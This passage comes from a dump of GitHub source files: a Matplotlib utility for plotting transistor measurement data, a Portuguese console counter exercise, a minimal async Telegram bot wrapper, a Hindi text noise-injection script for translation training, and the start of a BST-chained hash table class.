pointsPerX = extractSweep(axis, jsonData, direction='both', x_data='gate voltage', y_data='drain current')\n\tvgs_fwd, vgs_rev, id_fwd, id_rev = x[0], x[1], y[0], 
y[1]\n\t\n\thysteresis_extraction = fet_model.FET_Hysteresis(vgs_fwd, id_fwd, vgs_rev, id_rev, noise_floor=1e-10)\n\tvgs_region = hysteresis_extraction['V_GS']\n\thysteresis = hysteresis_extraction['H']\n\t\n\tline = axis.plot(vgs_region, np.array(hysteresis) * scaleYaxisBy, color=lineColor, marker='o', markersize=2, linewidth=(0 if(lineStyle == '') else 1))[0]\t\t\t\t\n\treturn line\n\n# === Parameter Plots ===\ndef plotSweepParameters(axis, lineColor, start, end, points, duplicates, ramps, time_offset=0):\n\tsweep_waveform = dgu.sweepValuesWithDuplicates(start, end, points*2*duplicates, duplicates, ramps)\n\tsweep_waveform = [item for sublist in sweep_waveform for item in sublist]\n\ttime_waveform = np.linspace(time_offset, time_offset+1, len(sweep_waveform))\n\t\n\taxis.set_yticks([start, 0, end])\n\taxis.set_xticks([0, time_offset+1])\n\taxis.set_xticklabels(['Start', 'End'])\n\t\n\tline = axis.plot(time_waveform, sweep_waveform, color=lineColor, marker='o', markersize=2, linewidth=1)[0]\t\t\t\t\n\treturn line\n\ndef plotStaticParameter(axis, lineColor, value, duration, measurementTime, time_offset=0):\n\ttime_waveform = np.linspace(time_offset, time_offset+duration, max(int(duration/measurementTime)+1, 2))\n\tline = axis.plot(time_waveform, [value]*len(time_waveform), color=lineColor, marker='o', markersize=2, linewidth=1)[0]\t\t\t\t\n\treturn line\n\ndef plotRapidParameter(axis, lineColor, waveform, values, points, maxStep, other_length=0):\n\tvalues = values if(len(values) >= other_length) else values + [values[-1]]*(other_length-len(values))\n\tvalue_waveform = dgu.waveformValues(waveform, values, points, maxStep)\n\ttime_waveform = np.linspace(0, 1, len(value_waveform))\n\t\n\taxis.set_xticks([0, 1])\n\taxis.set_xticklabels(['Start', 'End'])\n\t\n\tline = axis.plot(time_waveform, value_waveform, color=lineColor, marker='o', markersize=2, linewidth=1)[0]\t\t\t\t\n\treturn line\n\ndef plotSmallSignalParameter(axis, lineColor, offset, amplitude, periods, points, frequencies):\n\tline = None\n\ttime_start = 0\n\tfor frequency in frequencies:\n\t\tvalue_waveform = dgu.sineValues(offset, amplitude, periods, points*periods)\n\t\ttime_waveform = np.linspace(time_start, time_start + periods/frequency, len(value_waveform))\n\t\t\n\t\tline = axis.plot(time_waveform, value_waveform, color=lineColor, marker='o', markersize=2, linewidth=1)[0]\t\t\n\t\ttime_start = time_waveform[-1]\n\treturn line\n\n# === Figures ===\ndef initFigure(rows, columns, figsizeDefault, figsizeOverride=None, shareX=False, subplotWidthRatio=None, subplotHeightRatio=None):\n\tfigsize = figsizeDefault\n\tif(figsizeOverride != None):\n\t\tfigsize = figsizeOverride\n\n\tif(rows > 1 or columns > 1):\n\t\tfig, axes = plt.subplots(rows, columns, figsize=figsize, sharex=shareX, gridspec_kw={'width_ratios':subplotWidthRatio, 'height_ratios':subplotHeightRatio})\n\telse:\n\t\tfig, axes = plt.subplots(rows, columns, figsize=figsize)\n\n\treturn fig, axes\n\ndef adjustAndSaveFigure(figure, plotType, mode_parameters, subplotWidthPad=0, subplotHeightPad=0):\n\t# figure.align_labels()\n\tfigure.tight_layout()\n\tplt.subplots_adjust(wspace=subplotWidthPad, hspace=subplotHeightPad)\n\tpngDPI = (600) if(mode_parameters['publication_mode']) else (mode_parameters['default_png_dpi'])\n\tif(mode_parameters['saveFigures']):\n\t\tprint('[MPL]: Saving figures.')\n\t\tstart = time.time()\n\t\tif isinstance(mode_parameters['plotSaveName'], io.BytesIO):\n\t\t\tplt.savefig(mode_parameters['plotSaveName'], transparent=True, dpi=pngDPI, 
format='png')\n\t\telse:\n\t\t\tplt.savefig(os.path.join(mode_parameters['plotSaveFolder'], mode_parameters['plotSaveName'] + plotType + mode_parameters['plotSaveExtension']), transparent=True, dpi=pngDPI)\n\t\tend = time.time()\n\t\tprint('[MPL]: Figures saved. (Seconds elapsed: {:.3f} s)'.format(end-start))\n\tif(not mode_parameters['showFigures']):\n\t\tprint('[MPL]: Closing figures.')\n\t\tplt.close(figure)\n\n\n\n\n# === Plots ===\ndef plotWithErrorBars(axis, x, y, lineColor, pointsPerX, errorBars=True, alpha=1):\n\tx_unique, avg, std = avgAndStdAtEveryPoint(x, y, pointsPerX)\n\tif(not errorBars):\n\t\tstd=None\n\treturn axis.errorbar(x_unique, avg, yerr=std, color=lineColor, linewidth=1, capsize=2, capthick=0.5, elinewidth=0.5, alpha=alpha)[0]\n\ndef plotOverTime(axis, timestamps, y, lineColor, offset=0, markerSize=1, lineWidth=1, lineStyle=None, plotInnerGradient=False, innerGradientColors=None):\n\tzeroed_timestamps = list( np.array(timestamps) - timestamps[0] + offset )\n\tif(not plotInnerGradient):\n\t\treturn axis.plot(zeroed_timestamps, y, color=lineColor, marker='o', markersize=markerSize, linewidth=lineWidth, linestyle=lineStyle)[0]\n\telse:\n\t\tN = len(y)//20\n\t\tif N < 1:\n\t\t\tN = 1\n\t\tfor i in range(0, len(y)-1, N):\n\t\t\tp = axis.plot(zeroed_timestamps[i:i+1+N], y[i:i+1+N], color=innerGradientColors[i])\n\t\treturn p[0]\n\ndef boxplot(axis, data):\n\treturn axis.boxplot(data, meanline=True, showmeans=True, showfliers=False, medianprops={'color':'#000000'}, meanprops={'color':'#000000'})\n\n\n\n# === Colors ===\ndef setupColors(fig, numberOfColors, colorOverride=[], colorDefault=['#1f77b4', '#f2b134', '#4fb99f', '#ed553b', '#56638A'], colorMapName='plasma', colorMapStart=0, colorMapEnd=0.87, enableColorBar=False, colorBarTicks=[0,1], colorBarTickLabels=['End','Start'], colorBarAxisLabel=''):\n\tif(isinstance(colorOverride, tuple)):\n\t\tcolorMapName = colorOverride[0]\n\t\tcolorMapStart = colorOverride[1]\n\t\tcolorMapEnd = colorOverride[2]\n\telif(numberOfColors == len(colorOverride)):\n\t\treturn colorOverride\n\n\tcolors = None\n\tif(numberOfColors <= len(colorDefault)):\n\t\tcolors = colorDefault.copy()\n\telse:\n\t\tcolorMap = colorsFromMap(colorMapName, colorMapStart, colorMapEnd, numberOfColors)\n\t\tcolors = colorMap['colors']\n\t\tif(enableColorBar and numberOfColors >= 5):\n\t\t\tcolorBar(fig, colorMap['smap'], ticks=colorBarTicks, tick_labels=colorBarTickLabels, axisLabel=colorBarAxisLabel)\n\n\t#for color in colors:\n\t#\tprint(pltc.to_hex(color))\n\n\treturn colors\n\ndef colorsFromMap(mapName, colorStartPoint, colorEndPoint, numberOfColors):\n\tscalarColorMap = cm.ScalarMappable(norm=pltc.Normalize(vmin=0, vmax=1.0), cmap=mapName)\n\treturn {'colors':[scalarColorMap.to_rgba(i) for i in np.linspace(colorStartPoint, colorEndPoint, numberOfColors)], 'smap':scalarColorMap}\n\ndef colorBar(fig, scalarMappableColorMap, ticks=[0,1], tick_labels=['End','Start'], axisLabel='Time'):\n\tscalarMappableColorMap._A = []\n\tcbar = fig.colorbar(scalarMappableColorMap, pad=0.02, aspect=50)\n\tcbar.set_ticks(ticks)\n\tcbar.ax.set_yticklabels(tick_labels, rotation=270)\n\tcbar.ax.yaxis.get_majorticklabels()[0].set_verticalalignment('bottom')\n\tcbar.ax.yaxis.get_majorticklabels()[-1].set_verticalalignment('top')\n\tif len(ticks) > 2:\n\t\tfor i in range(len(ticks) - 2):\n\t\t\tcbar.ax.yaxis.get_majorticklabels()[i+1].set_verticalalignment('center')\n\tcbar.set_label(axisLabel, rotation=270, labelpad=0.9)\n\n\n\n# === Labels ===\ndef setLabel(line, 
label):\n\tline.set_label(label)\n\ndef semiLogScale(axis):\n\taxis.set_yscale('log')\n\ndef axisLabels(axis, x_label=None, y_label=None):\n\tif(x_label is not None):\n\t\taxis.set_xlabel(x_label)\n\tif(y_label is not None):\n\t\taxis.set_ylabel(y_label)\n\ndef axisColors(axis, x_color=None, y_color=None):\n\tif(x_color is not None):\n\t\taxis.xaxis.label.set_color(x_color)\n\t\taxis.tick_params(axis='x', colors=x_color)\n\tif(y_color is not None):\n\t\taxis.yaxis.label.set_color(y_color)\n\t\taxis.tick_params(axis='y', colors=y_color)\n\ndef tickLabels(axis, labelList, rotation=0):\n\taxis.set_xticklabels(labelList)\n\taxis.set_xticks(range(len(labelList)))\n\taxis.xaxis.set_tick_params(rotation=rotation)\n\ndef includeOriginOnYaxis(axis, include=True, stretchfactor=1):\n\tif(include):\n\t\tif(axis.get_ylim()[1] < 0):\n\t\t\taxis.set_ylim(top=0)\n\t\telif(axis.get_ylim()[0] > 0):\n\t\t\taxis.set_ylim(bottom=0)\n\taxis.set_ylim(bottom=axis.get_ylim()[0]*stretchfactor, top=axis.get_ylim()[1]*stretchfactor)\n\ndef includeOriginOnXaxis(axis, include=True, stretchfactor=1):\n\tif(include):\n\t\tif(axis.get_xlim()[1] < 0):\n\t\t\taxis.set_xlim(right=0)\n\t\telif(axis.get_xlim()[0] > 0):\n\t\t\taxis.set_xlim(left=0)\n\taxis.set_xlim(left=axis.get_xlim()[0]*stretchfactor, right=axis.get_xlim()[1]*stretchfactor)\n\ndef includeAtLeastOrderOfMagnitudeOnYaxis(axis, include=True, stretchfactor=5, cutoff=25):\n\tif(include):\n\t\tif(axis.get_ylim()[1]/axis.get_ylim()[0] < cutoff):\n\t\t\taxis.set_ylim(bottom=axis.get_ylim()[0]/stretchfactor, top=axis.get_ylim()[1]*stretchfactor)\n\ndef getTestLabel(deviceHistory, identifiers):\n\tif(identifiers is None):\n\t\treturn ''\n\n\tlabel = str(identifiers['wafer']) + str(identifiers['chip']) + ':' + identifiers['device']\n\tif len(deviceHistory) > 0:\n\t\ttest1Num = deviceHistory[0]['experimentNumber']\n\t\ttest2Num = deviceHistory[-1]['experimentNumber']\n\t\tif test1Num == test2Num:\n\t\t\tlabel += ', Test {:}'.format(test1Num)\n\t\telse:\n\t\t\tlabel += ', Tests {:}-{:}'.format(test1Num, test2Num)\n\treturn label\n\n\n\n# === Legend ===\ndef addLegend(axis, loc, title, mode_parameters=None):\n\tif((mode_parameters is not None) and (mode_parameters['enableLegend'] == False)):\n\t\treturn\n\tlines, labels = axis.get_legend_handles_labels()\n\taxis.legend(lines, labels, loc=loc, title=title, labelspacing=(0) if(len(labels) == 0) else (0.3))\n\n# Helper. 
Will return list of indices with all occurrences of min value, and min value.\ndef minIndicesAndValue(lst):\n\tminValue = lst[0]\n\tminIndices = [0]\n\tfor i in range(1, len(lst)):\n\t\tif lst[i] < minValue:\n\t\t\tminValue = lst[i]\n\t\t\tminIndices = [i]\n\t\telif lst[i] == minValue:\n\t\t\tminIndices.append(i)\n\treturn (minIndices, minValue)\n\ndef maxIndicesAndValue(lst):\n\tmaxValue = lst[0]\n\tmaxIndices = [0]\n\tfor i in range(1, len(lst)):\n\t\tif lst[i] > maxValue:\n\t\t\tmaxValue = lst[i]\n\t\t\tmaxIndices = [i]\n\t\telif lst[i] == maxValue:\n\t\t\tmaxIndices.append(i)\n\treturn (maxIndices, maxValue)\n\ndef getLegendTitle(deviceHistory, identifiers, plottype_parameters, parameterSuperType, parameterType, mode_parameters=None, current_scale=1, voltage_scale=1, includeDataMin=False, includeDataMax=False, includeVgsChange=False, includeVdsSweep=False, includeVgsSweep=False, includeVdsHold=False, includeVgsHold=False, includeIdHold=False, includeIgHold=False, includeTimeHold=False, includeChannelLength=False):\n\tlegend_title = ''\n\tlegend_entries = []\n\t\n\t# SNR\n\tif(includeDataMin):\n\t\trawXData = getParameterArray(deviceHistory, 'Results', '', 'vgs_data_to_plot')[0]\n\t\trawYData = getParameterArray(deviceHistory, 'Results', '', 'snr_to_plot')[0]\n\t\txData = []\n\t\tyData = []\n\t\tfor sublist in rawXData:\n\t\t\txData = xData + sublist\n\t\tfor sublist in rawYData:\n\t\t\tyData = yData + sublist\n\t\tif len(xData) > 0 and len(yData) > 0:\n\t\t\t(minIndices, minValue) = minIndicesAndValue(yData)\n\t\telse:\n\t\t\tminIndices = []\n\t\tcorrespondingXValues = [xData[i] for i in minIndices]\n\t\tfor x in correspondingXValues:\n\t\t\tlegend_entries.append('Min = ' + plottype_parameters['leg_data_min_x'].format(round(x, 2)) + ', ' + plottype_parameters['leg_data_min_y'].format(round(minValue, 2)))\n\tif(includeDataMax):\n\t\trawXData = getParameterArray(deviceHistory, 'Results', '', 'vgs_data_to_plot')[0]\n\t\trawYData = getParameterArray(deviceHistory, 'Results', '', 'snr_to_plot')[0]\n\t\txData = []\n\t\tyData = []\n\t\tfor sublist in rawXData:\n\t\t\txData = xData + sublist\n\t\tfor sublist in rawYData:\n\t\t\tyData = yData + sublist\n\t\tif len(xData) > 0 and len(yData) > 0:\n\t\t\t(maxIndices, maxValue) = maxIndicesAndValue(yData)\n\t\telse:\n\t\t\tmaxIndices = []\n\t\tcorrespondingXValues = [xData[i] for i in maxIndices]\n\t\tfor x in correspondingXValues:\n\t\t\tlegend_entries.append('Max = ' + plottype_parameters['leg_data_max_x'].format(round(x, 2)) + ', ' + plottype_parameters['leg_data_max_y'].format(round(maxValue, 2)))\n\tif(includeVgsChange):\n\t\tvgs_max = getParameterArray(deviceHistory, 'runConfigs', 'GateSweep', 'gateVoltageMaximum')\n\t\tvgs_min = getParameterArray(deviceHistory, 'runConfigs', 'GateSweep', 'gateVoltageMinimum')\n\t\tvgs_steps = getParameterArray(deviceHistory, 'runConfigs', 'GateSweep', 'stepsInVGSPerDirection')\n\t\tvgs_change = (vgs_max[0] - vgs_min[0])/(vgs_steps[0] - 1)\n\t\tlegend_entries.append(plottype_parameters['leg_vgs_change'].format(round(vgs_change, 2)))\n\t\n\t# GateSweep\n\tif(includeVdsSweep):\n\t\tvds_list = getParameterArray(deviceHistory, parameterSuperType, parameterType, 'drainVoltageSetPoint')\n\t\tvds_min = min(vds_list) * voltage_scale\n\t\tvds_max = max(vds_list) * voltage_scale\n\t\tlegend_entries.append(plottype_parameters['leg_vds_label'].format(vds_min) if(vds_min == vds_max) else (plottype_parameters['leg_vds_range_label'].format(vds_min, vds_max)))\n\t\n\t# DrainSweep\n\tif(includeVgsSweep):\n\t\tvgs_list = getParameterArray(deviceHistory, parameterSuperType, parameterType, 'gateVoltageSetPoint')
\n\t\tvgs_min = min(vgs_list) * voltage_scale\n\t\tvgs_max = max(vgs_list) * voltage_scale\n\t\tlegend_entries.append(plottype_parameters['leg_vgs_label'].format(vgs_min) if(vgs_min == vgs_max) else (plottype_parameters['leg_vgs_range_label'].format(vgs_min, vgs_max)))\n\t\n\t# StaticBias/StaticCurrent\n\tif(includeVdsHold):\n\t\tlegend_entries.append(plottype_parameters['vds_legend'].format(deviceHistory[0][parameterSuperType][parameterType]['drainVoltageSetPoint'] * voltage_scale))\n\tif(includeVgsHold):\n\t\tlegend_entries.append(plottype_parameters['vgs_legend'].format(deviceHistory[0][parameterSuperType][parameterType]['gateVoltageSetPoint'] * voltage_scale))\n\tif(includeIdHold):\n\t\tlegend_entries.append(plottype_parameters['id_legend'].format(deviceHistory[0][parameterSuperType][parameterType]['drainCurrentSetPoint'] * current_scale))\n\tif(includeIgHold):\n\t\tlegend_entries.append(plottype_parameters['ig_legend'].format(deviceHistory[0][parameterSuperType][parameterType]['gateCurrentSetPoint'] * current_scale))\n\tif(includeTimeHold):\n\t\tlegend_entries.append(plottype_parameters['t_legend'].format(timeWithUnits(np.mean([jsonData[parameterSuperType][parameterType]['totalBiasTime'] for jsonData in deviceHistory]))))\n\t\n\t# Channel length from wafer.json info file\n\tif(includeChannelLength):\n\t\tif((mode_parameters is not None) and (mode_parameters['generalInfo'] is not None)):\n\t\t\ttry:\n\t\t\t\twafer_info = mode_parameters['generalInfo']\n\t\t\t\tL_ch = wafer_info['channel_length_nm'][identifiers['chip']][identifiers['device']] if(identifiers['chip'] in wafer_info['channel_length_nm']) else wafer_info['channel_length_nm'][identifiers['device']]\n\t\t\t\tif(L_ch < 1000):\n\t\t\t\t\tlegend_entries.append('$L_{{ch}} = $ {:} nm'.format(L_ch))\n\t\t\t\telse:\n\t\t\t\t\tlegend_entries.append('$L_{{ch}} = $ {:.1f} $\\\\mu$m'.format(L_ch/1000))\n\t\t\texcept Exception:\n\t\t\t\tprint('Unable to find L_ch for device: ' + str(identifiers) + ' in the provided wafer.json.')\n\n\t# Override\n\tif((mode_parameters is not None) and (mode_parameters['legendTitleOverride'] != '')):\n\t\tlegend_entries = [mode_parameters['legendTitleOverride']]\n\n\t# Concatenate legend entries with new lines\n\tfor i in range(len(legend_entries)):\n\t\tif(i != 0):\n\t\t\tlegend_title += '\\n'\n\t\tlegend_title += legend_entries[i]\n\n\treturn legend_title\n\n\n\n# === Curve Fitting ===\n\n## EXAMPLE ##\n#for deviceRun in deviceHistory:\n#\tstartIndex, endIndex = steepestRegion(np.log10(np.abs(deviceRun['Results']['id_data'][0])), 10)\n#\tvgs_region = deviceRun['Results']['vgs_data'][0][startIndex:endIndex]\n#\tid_region = deviceRun['Results']['id_data'][0][startIndex:endIndex]\n#\tfitted_region = semilogFit(vgs_region, id_region)['fitted_data']\n#\tSS_list.append(avgSubthresholdSwing(vgs_region, fitted_region))\n#\taxis.plot(vgs_region, fitted_region, color='b', linestyle='--')\n#SS_avg = np.mean(SS_list)\n\ndef linearFit(x, y):\n\tslope, intercept = np.polyfit(x, y, 1)\n\tfitted_data = [slope*x[i] + intercept for i in range(len(x))]\n\treturn {'fitted_data': fitted_data,'slope':slope, 'y_intercept':intercept, 'x_intercept':-intercept/slope}\n\ndef quadraticFit(x, y):\n\ta, b, c = np.polyfit(x, y, 2)\n\tfitted_data = [(a*(x[i]**2) + b*x[i] + c) for i in range(len(x))]\n\treturn {'fitted_data': fitted_data, 'a':a, 'b':b, 'c':c}\n\ndef semilogFit(x, y):\n\tfit_results = linearFit(x, np.log10(np.abs(y)))\n\tfitted_data = [10**(fit_results['fitted_data'][i]) for i in range(len(fit_results['fitted_data']))]
\n\treturn {'fitted_data': fitted_data}\n\ndef steepestRegion(data, numberOfPoints):\n\tmaxSlope = 0\n\tindex = 0\n\tfor i in range(len(data) - 1):\n\t\tdiff = abs(data[i] - data[i+1])\n\t\tif(diff > maxSlope):\n\t\t\tmaxSlope = diff\n\t\t\tindex = i\n\tregionStart = max(0, index - numberOfPoints/2)\n\tregionEnd = min(len(data)-1, index + numberOfPoints/2)\n\treturn (int(regionStart), int(regionEnd))\n\n\n\n# === Metrics ===\ndef avgSubthresholdSwing(vgs_data, id_data):\n\treturn (abs( (vgs_data[0] - vgs_data[-1]) / (np.log10(np.abs(id_data[0])) - np.log10(np.abs(id_data[-1]))) ) * 1000)\n\n\n\n# === Statistics ===\ndef avgAndStdAtEveryPoint(x, y, pointsPerX):\n\tx_uniques = []\n\ty_averages = []\n\ty_standardDeviations = []\n\ti = 0\n\twhile (i < len(y)):\n\t\tj = i+pointsPerX\n\t\tx_uniques.append(x[i])\n\t\ty_averages.append(np.mean(y[i:j]))\n\t\ty_standardDeviations.append(np.std(y[i:j]))\n\t\ti = j\n\n\treturn (x_uniques, y_averages, y_standardDeviations)\n\ndef nextIndexToBeDifferent(data, i):\n\tvalue = data[i]\n\twhile((i < len(data)) and (data[i] == value)):\n\t\ti += 1\n\treturn i\n\ndef secondsPer(amountOfTime):\n\tif(amountOfTime == 'seconds'):\n\t\treturn 1\n\telif(amountOfTime == 'min'):\n\t\treturn 60\n\telif(amountOfTime == 'hr'):\n\t\treturn 3600\n\telif(amountOfTime == 'days'):\n\t\treturn 3600*24\n\telif(amountOfTime == 'weeks'):\n\t\treturn 3600*24*7\n\telif(amountOfTime == 'months'):\n\t\treturn 3600*24*30\n\telse:\n\t\treturn 0\n\ndef timeWithUnits(seconds):\n\ttime = seconds\n\tunit = 's'\n\n\tif seconds >= 60*60*24*30:\n\t\ttime = seconds/(60*60*24*30)\n\t\tunit = 'month'\n\telif seconds >= 60*60*24*7:\n\t\ttime = seconds/(60*60*24*7)\n\t\tunit = 'wk'\n\telif seconds >= 60*60*24:\n\t\ttime = seconds/(60*60*24)\n\t\tunit = 'day' if int(time) == 1 else 'days'\n\telif seconds >= 60*60:\n\t\ttime = seconds/(60*60)\n\t\tunit = 'hr'\n\telif seconds >= 60:\n\t\ttime = seconds/(60)\n\t\tunit = 'min'\n\t# durations under 60 seconds keep the defaults set above\n\n\treturn '{} {}'.format(int(time), unit)\n\ndef bestTimeScaleFor(seconds):\n\tif(seconds < 2*60):\n\t\treturn 'seconds'\n\telif(seconds < 2*60*60):\n\t\treturn 'min'\n\telif(seconds < 2*60*60*24):\n\t\treturn 'hr'\n\telif(seconds < 2*60*60*24*7):\n\t\treturn 'days'\n\telif(seconds < 2*60*60*24*30):\n\t\treturn 'weeks'\n\telse:\n\t\treturn 'months'\n\n\n\n# === Data Manipulation ===\ndef flatten(dataList):\n\tdata = list([dataList])\n\twhile(isinstance(data[0], list)):\n\t\tdata = [(item) for sublist in data for item in sublist]\n\treturn data\n\ndef scaledData(deviceHistory, dataSubdirectory, dataToScale, scalefactor):\n\tdata = list(deviceHistory)\n\tfor i in range(len(data)):\n\t\tdata_entry = data[i][dataSubdirectory][dataToScale]\n\t\tif(isinstance(data_entry[0], list)):\n\t\t\tfor j in range(len(data_entry)):\n\t\t\t\tdata_entry[j] = list(np.array(data_entry[j])*scalefactor)\n\t\telse:\n\t\t\tdata_entry = list(np.array(data_entry)*scalefactor)\n\t\tdata[i][dataSubdirectory][dataToScale] = data_entry\n\treturn data\n\ndef getParameterArray(deviceHistory, parameterSuperType, parameterSubType, parameterName):\n\tresult = []\n\tfor i in range(len(deviceHistory)):\n\t\telement = deviceHistory[i]\n\t\tif(parameterSuperType != ''):\n\t\t\telement = element[parameterSuperType]\n\t\tif(parameterSubType != ''):\n\t\t\telement = element[parameterSubType]\n\t\tresult.append(element[parameterName])\n\treturn result
result\n","repo_name":"stevennoyce/AutexysHost","sub_path":"source/utilities/MatplotlibUtility.py","file_name":"MatplotlibUtility.py","file_ext":"py","file_size_in_byte":39184,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21254052332","text":"from time import sleep\n\ntitulo = str(input('\\nDefina um título: '))\nsleep(0.5)\nprint(f'\\n\\033[32m{titulo:•^50}\\033[m') # Centralizado.\nsleep(0.5)\nprint(f'\\n\\033[33m{titulo:.>50}\\033[m') # Direita.\nsleep(0.5)\nprint(f'\\n\\033[34m{titulo:_<50}\\033[m') # Esquerda.\n\n# Contador Manual.\nn = int(input('\\nAté quanto você deseja contar: '))\nprint('\\033[32m')\nfor i in range(n + 1):\n sleep(0.3)\n print(i)\nprint('\\033[m')\n\n# Contador com Ponto Incial & Final.\na = int(input('Ponto Inicial: '))\nb = int(input('Ponto Final: '))\nprint('\\033[33m')\nc = range(a, b + 1)\nfor d in c:\n sleep(0.3)\n print(d)\nprint('\\033[m')\n\n# Contador Infinito.\nx = -1\nwhile True:\n x > 0\n x = x + 1\n sleep(0.3)\n print(f'\\033[31m{x}\\033[m')","repo_name":"jonathansilveira1987/MACETES","sub_path":"PYTHON/contar.py","file_name":"contar.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23901959364","text":"from traceback import print_exc\nimport aiohttp\nfrom typing import Union\nfrom types import MethodType\n\nurl = \"https://api.telegram.org\"\n\ndef snake_case_to_camel_case(shake_case_str:str):\n return \"\".join((symb.capitalize() for symb in shake_case_str.split(\"_\")))\n\nclass TelegramError(Exception): pass\n\nclass LightTelegramBotError(Exception):\n def __init__(self):\n self.args = (\"Inner light_telegram_bot error\",)\n\nclass LightTelegramBotPollingError(Exception):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.args = (*self.args, \"Polling error\")\n\nclass NextHandler(Exception):\n def __init__(self):\n self.args = (\"don't use this error outside of light_telegram_bot handler\",)\n\nclass Bot:\n def __init__(self, token: str):\n self._http_exceptions = {}\n self._token = token\n self.cache = {}\n\n async def __new__(cls, *args, **kwargs):\n obj = super().__new__(cls)\n obj._session = aiohttp.ClientSession(url)\n obj.__init__(*args, **kwargs)\n return obj\n\n def __getattr__(self, attr: str):\n if attr in self.cache:\n return self.cache[attr]\n\n url = \"/bot\"+self._token+\"/\"+snake_case_to_camel_case(attr)\n async def function(bot, **kwargs):\n async with bot._session.get(url, params=kwargs) as response:\n response_data = await response.json()\n if response_data[\"ok\"]:\n return response_data[\"result\"]\n else:\n raise bot.get_http_exception(response_data[\"error_code\"])(\n response_data[\"description\"]\n )\n\n function.__name__ = attr\n function.__qualname__ = self.__class__.__qualname__ + \".\" + attr\n method = MethodType(function, self)\n self.cache[attr] = method\n return method\n\n def get_http_exception(self, number:int):\n if number in self._http_exceptions:\n return self._http_exceptions[number]\n else:\n HttpException = type(f\"TelegramError{number}\", (TelegramError,), {})\n self._http_exceptions[number] = HttpException\n return HttpException\n\n\nclass BotPolling:\n def __init__(self, bot, start_offset=0):\n self._handlers = []\n self._bot = bot\n self._offset = start_offset\n\n async def start(self, timeout=60, **kwargs):\n try:\n while 1:\n updates = await self._bot.get_updates(timeout=timeout, offset=self._offset, 
\n                if updates:\n                    self._offset = updates[-1][\"update_id\"]+1\n                    for update in updates:\n                        for handler in self._handlers:\n                            try:\n                                await handler(update)\n                            except NextHandler:\n                                pass\n                            else:\n                                break\n        except Exception:\n            print_exc()\n            raise LightTelegramBotPollingError()\n    \n    def handler(self, f):\n        self._handlers.append(f)\n        return f  # return f so handler() also works as a decorator\n    ","repo_name":"Chebotarev-Alexey/light_telegram_bot","sub_path":"light_telegram_bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"5319719119","text":"import random\nimport argparse\nfrom tqdm import tqdm\n\nparser = argparse.ArgumentParser(description='Add noise to sentences in a file')\nparser.add_argument('input_file', type=str, help='Path to the input file')\nparser.add_argument('output_file', type=str, help='Path to the output file')\nparser.add_argument('--noisy_ratio', type=float, default=0.1, help='Ratio of words per sentence to add noise to (default: 0.1)')\nparser.add_argument('--random_seed', type=int, default=42, help='Random seed for generating noise (default: 42)')\n\nargs = parser.parse_args()\n\n# Now you can access the arguments using the variable 'args'\ninput_file_path = args.input_file\noutput_file_path = args.output_file\nnoisy_ratio = args.noisy_ratio\nrandom_seed = args.random_seed\n\n# Seed the RNG so the injected noise is reproducible\nrandom.seed(random_seed)\n\n\ndef insert_char(s):\n    \"\"\"Insert a random character in the given string\"\"\"\n    char = chr(random.randint(2304, 2431)) # Choose a random Hindi character code\n    pos = random.randint(0, len(s))\n    #print(\"insertion\",char)\n\n    return s[:pos] + char + s[pos:]\n\ndef substitute_char(s):\n    \"\"\"Substitute a random character in the given string\"\"\"\n    char = chr(random.randint(2304, 2431)) # Choose a random Hindi character code\n    pos = random.randint(0, len(s)-1)\n    #print(\"subti\",char)\n    return s[:pos] + char + s[pos+1:]\n\ndef delete_char(s):\n    \"\"\"Delete a random character in the given string\"\"\"\n    pos = random.randint(0, len(s)-1)\n    #print(\"del\")\n    return s[:pos] + s[pos+1:]\n\ndef inject_noise(s):\n    \"\"\"Inject character-level noise in the given Hindi sentence\"\"\"\n    words = s.split()\n    num_noisy_words = max(1, round(len(words) * noisy_ratio)) # Choose at least 1 word to add noise to\n    noisy_word_indices = random.sample(range(len(words)), num_noisy_words)\n    #print(noisy_word_indices)\n    for idx in noisy_word_indices:\n        word = words[idx]\n        #num_ops = random.randint(1, 3) # Choose a random number of operations to perform (1 to 3)\n        #print(num_ops)\n        #for i in range(num_ops):\n        op = random.randint(1, 3) # Choose a random operation (1: insertion, 2: substitution, 3: deletion)\n        if op == 1:\n            word = insert_char(word)\n        elif op == 2:\n            word = substitute_char(word)\n        elif op == 3:\n            word = delete_char(word)\n        words[idx] = word\n    return ' '.join(words)\n\n\n# Read input file and add noise to sentences\nwith open(input_file_path, \"r\", encoding=\"utf-8\") as input_file, open(output_file_path, \"w\", encoding=\"utf-8\") as output_file:\n    for line in tqdm(input_file):\n        noisy_line = inject_noise(line.strip())\n        output_file.write(noisy_line + \"\\n\")","repo_name":"ShreySatapara/NMT-for-Low-Resource-Languages","sub_path":"noice_injection_hindi.py","file_name":"noice_injection_hindi.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15038476459","text":"\"\"\"\r\nAuthor: Gray A. LeCompte
\r\nDate: 20 November 2017\r\nDescription: Implements chaining and probing hash table classes\r\n\"\"\"\r\n\r\nfrom BinaryTree import BinarySearchTree\r\n\r\nclass HashTableBST():\r\n    \"\"\"\r\n    Creates a hash table, uses chaining (Binary Search Tree from BST class) for collision resolution\r\n    param: size of the hash table, if no size is given default size is set to prime number\r\n    \"\"\"\r\n    def __init__(self, size = None):\r\n        if size is None:\r\n            self.__size = 199 # Prime numbers optimal for hash table size\r\n        else:\r\n            self.__size = size\r\n        # Utilizing binary search tree for collision resolution\r\n        self.__buckets = []\r\n        for i in range(self.__size):\r\n            self.__buckets.append(BinarySearchTree())\r\n\r\n    def isEmpty(self, value):\r\n        \"\"\"\r\n        Checks if the location is empty or not\r\n        return: True if there is no value at location\r\n                False otherwise\r\n        \"\"\"\r\n        if self.retrieve(value) is None:\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    def __str__(self):\r\n        \"\"\"\r\n        Returns the hash table buckets and contents as a string\r\n        \"\"\"\r\n        result = \"\"\r\n        for i in range(self.__size):\r\n            result += \"bucket \" + str(i) + \": \" + \"\\nsize: \" + str(self.__buckets[i].size()) + \"\\n\" + 